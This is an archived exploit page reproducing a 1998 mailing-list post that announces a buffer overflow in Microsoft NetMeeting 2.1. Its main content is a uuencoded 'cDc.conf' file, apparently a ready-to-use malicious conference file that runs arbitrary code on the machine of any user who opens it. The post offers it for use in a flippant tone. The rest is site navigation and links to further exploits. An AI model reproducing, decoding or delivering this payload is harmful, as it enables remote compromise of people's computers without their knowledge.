Overflow in Microsoft Netmeeting

Summary
Description:Standard overflow
Author:DilDog <dildog@L0PHT.COM>
Compromise:remotely execute arbitrary commands on the machine of a windows/netmeeting user (the user must click on your neetmeeting .conf file)
Vulnerable Systems:Windows boxes running Micro$oft Netmeeting V. 2.1
Date:16 April 1998
Notes:For a lot more information on this exploit, including a short windows overflow tutorial, see http://www.cultdeadcow.com/cDc_files/cDc-351/ .
Details


Date: Thu, 16 Apr 1998 16:27:13 -0500
From: DilDog <dildog@L0PHT.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: The Tao of Windows Buffer Overflow

Boys, girls, lepers, and lost souls,

Venture your browsers to http://204.57.138.9/   (www.cultdeadcow.com)

There exists cDc t-file #351, an extensive document detailing on the 'The
Tao of Windows Buffer Overflow'. It relates a buffer overflow in
Microsoft Netmeeting 2.1, in the parlance of a street thug and with the
grace of a one-legged ostrich. In short, even yo momma could understand
it. Get it.

It tells you what you need to know, and then some.

                                        -- DilDog
                                   cDc Ninja Strike Force
begin 600 cDc.conf
M6T-O;F9E<F5N8V53:&]R=&-U=%T-"D-O;F9.86UE/65X<&QO9&4-"D%D9')E
M<W,]/BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN
M+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN
M+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN
M+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN
M+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN
M+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXN+BXQ,C,T=BI@
M:I"0D)"0D)"0D)`SR;B`4_]C+(#!P!BQM$B`,(#B^KY\$&!J4%#_%HOP6XO[
M9H'O2__\,\F`Z?I#,L#7A,!U^$-14U;_%7@08&JK6>+J0S+`UX3`=?A#4U/_
M%7P08&J+\)"0D)`SR8/I_$,RP->$P'7X0U%35O\5>!!@:JM9XNJ0D#/`9DC1
MX#/24%+_5^R+\#/24E)24E?_5_`STE)24I!2B]>#ZE"0D)!24/]7^%<STF9*
MT>)25E#_5_R0D)`STE*+UX/J,$*0D%+_5]C_-U90B]C_5]Q3_U?@D)"0,])"
M4HO7@^HP0I"04O]7Y)"0D/]7Z,S,S"TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM
M+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM+2TM
M+<O%TL[%S+.R@-_LX_+EX?2`W^SW\NGTY8#?[./L[_/E@-?I[L7XY>.`Q?CI
M]-#R[^/E\_.`Q^SOXN'LP>SL[^.`U\G.R<[%U(#)[O3E\N[E],_PY>[!@,GN
M].7R[N7TP^SO\^7(X>[D[.6`R>[TY?+NY?3/\.7NU?+LP8#)[O3E\N[E]-+E
MX>3&Z>SE@.CT]/"ZKZ_W]_>N[+#PZ/2NX^_MK_[DZ>SD[^>OY>'T[>6NY?CE
M@#P-"D-A;&Q&;&%G<STV-34T,PT*5')A;G-P;W)T/3,R-S8W#0H-"@T*#0H-
)"@T*#0H-"@T*
`
end

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]